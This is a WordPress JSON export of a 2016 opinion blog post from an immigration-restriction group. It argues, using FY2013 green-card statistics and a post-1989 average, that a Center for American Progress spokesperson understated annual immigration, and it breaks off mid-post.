{"id":12490,"date":"2016-03-31T13:41:16","date_gmt":"2016-03-31T17:41:16","guid":{"rendered":"http:\/\/live-immigrationreform.pantheonsite.io\/?p=12490"},"modified":"2018-12-28T13:34:58","modified_gmt":"2018-12-28T18:34:58","slug":"deceptive-statement-on-the-size-of-the-immigrant-influx","status":"publish","type":"post","link":"https:\/\/www.immigrationreform.com\/2016\/03\/31\/deceptive-statement-on-the-size-of-the-immigrant-influx\/","title":{"rendered":"Deceptive Statement on the Size of the Immigrant Influx"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignleft size-medium wp-image-12491\" alt=\"spreadsheet_numbers_rotator_675x450\" src=\"http:\/\/live-immigrationreform.pantheonsite.io\/wp-content\/uploads\/2016\/03\/spreadsheet_numbers_rotator_675x450-300x200.jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2016\/03\/spreadsheet_numbers_rotator_675x450-300x200.jpg 300w, https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2016\/03\/spreadsheet_numbers_rotator_675x450-100x67.jpg 100w, https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2016\/03\/spreadsheet_numbers_rotator_675x450-104x69.jpg 104w, https:\/\/www.immigrationreform.com\/wp-content\/uploads\/2016\/03\/spreadsheet_numbers_rotator_675x450.jpg 675w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>I participated earlier this month in a media interview on immigration along with a spokesperson for the leftist Center for American Progress (CAP).<\/p>\n<p><span style=\"line-height: 1.5em;\">I expressed incredulity that anyone would want to increase immigration when there are now on average more than one million immigrants admitted each year.\u00a0 The CAP spokesperson jumped on that statement and said that it was misleading because only a few hundred thousand new immigrants are admitted each year \u2013 others are already in the country waiting for a \u2018green card.\u2019<\/span><\/p>\n<p><span style=\"line-height: 1.5em;\">Technically he was correct.\u00a0 For example, in fiscal year 2013 (the latest data available in the Yearbook of Immigration Statistics) of 990,553 immigrants admitted for legal permanent residence (LPR), 495,751 of those persons were new arrivals and the others were persons already in the country who adjusted their nonimmigrant status to LPR status.<\/span><\/p>\n<p><span style=\"line-height: 1.5em;\">But, to say that the flow of immigrants into the country is less than about a million a year at present is deliberately misleading. The number of immigrant admissions since 1989 has averaged 1,045,021 per year, and that is testimony to the fact that even though some of these individuals entered as nonimmigrants and then converted to LPRs, their arrival is also part of the annual immigration flow.<\/span><\/p>\n<p><span style=\"line-height: 1.5em;\">Some of those new immigrants came as refugees or fianc\u00e9es or Cubans admitted under the \u2018wet-foot-dry-foot\u2019 policy and had to wait a year before they could get their \u2018green card.\u2019 Others came as \u2018temporary\u2019 workers, such as with H-1B visas, and had to wait several years for their employer to sponsor them.
